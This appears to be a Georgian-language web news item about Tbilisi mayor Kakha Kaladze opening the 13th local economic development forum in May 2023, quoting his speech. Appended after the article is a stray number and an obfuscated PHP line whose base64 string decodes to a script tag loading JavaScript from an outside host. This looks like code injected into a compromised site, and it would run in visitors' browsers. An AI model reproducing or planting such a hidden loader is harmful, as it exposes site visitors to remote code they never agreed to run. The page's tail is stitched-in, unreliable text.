celsiusi
ავერსი საქკაბელი

თბილისის მერიის ეკონომიკური განვითარების საქალაქო სამსახურის ორგანიზებით 2023 წლის 30-31 მაისს, სასტუმროში „რედისონ ბლუ ივერია“ გაიხსნა ადგილობრივი ეკონომიკური განვითარების მე-13 ფორუმი, სახელწოდებით „მდგრადი განვითარება - მწვანე, ჭკვიანი, ბიზნეს-მეგობრული“.

ღონისძიება დედაქალაქის მერმა კახა კალაძემ გახსნა. დედაქალაქის მერმა სიტყვით გამოსვლისას ეკონომიკური განვითარების ახალ გამოწვევებზე და მათი გადაწყვეტის გზებზე ისაუბრა.

„ეკონომიკური განვითარების ცვალებადი პარადიგმებისა და სწრაფად მზარდი გამოწვევების ეპოქაში, განვითარების თანამედროვე ტენდენციებისა და ცხოვრების ადეკვატური სტანდარტების უზრუნველყოფა, ჩვენგან მოითხოვს რაციონალურ, გონივრულ და ეფექტიან გადაწყვეტილებებს.

ეკონომიკის გააქტიურება და სიცოცხლისუნარიანი, მდგრადი, ინკლუზიური ეკონომიკური სისტემის გაზრდა, ურბანული პროექტების განხორციელება, ბიზნეს - მეგობრული გარემოს ჩამოყალიბების ხელშეწყობა, ინვესტიციების მოზიდვა და ინოვაციების დანერგვა ჩვენი დღის წესრიგის უმთავრესი პრიორიტეტია და არაერთი მნიშვნელოვანი ნაბიჯი გადაიდგა ამ მიმართულებით.

დამეთანხმებით, რომ მარტო ხელისუფლება ამ ურთულესს გზაზე უძლურია და მიზნის მიღწევა შესაძლებელია მხოლოდ მჭიდრო თანამშრომლობით და ურთიერთმხარდაჭერით.

შემიძლია ამაყად ვთქვათ, რომ დღეს, ჩვენს დედაქალაქში, ურბანული განვითარების პროექტების განხორციელების ტემპი აღნიშვნის ღირსია.

ჩვენ სკრუპულოზურად ვუდგებით ქალაქის თითოეული უბნის კეთილმოწყობას და სწრაფი ტემპით მივიწევთ წინ. ვაცოცხლებთ ძველს და ვქმნით ახალს. სიღრმისეულად ვიაზრებთ ყველა არსებული გამოწვევის არსს, რომელიც საჭიროებს მრავალმხრივი მიდგომების ჩამოყალიბებას და სწორი აქცენტების დასმას. ეს კი დაუღალავი შრომით და ჩვენი საზოგადოების ყველა ჯგუფის სრული ჩართულობით მიიღწევა. ჩვენს მთავარ ორიენტირს ჩვენი მოქალაქეები წარმოადგენენ“, - განაცხადა კახა კალაძემ. 

368
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");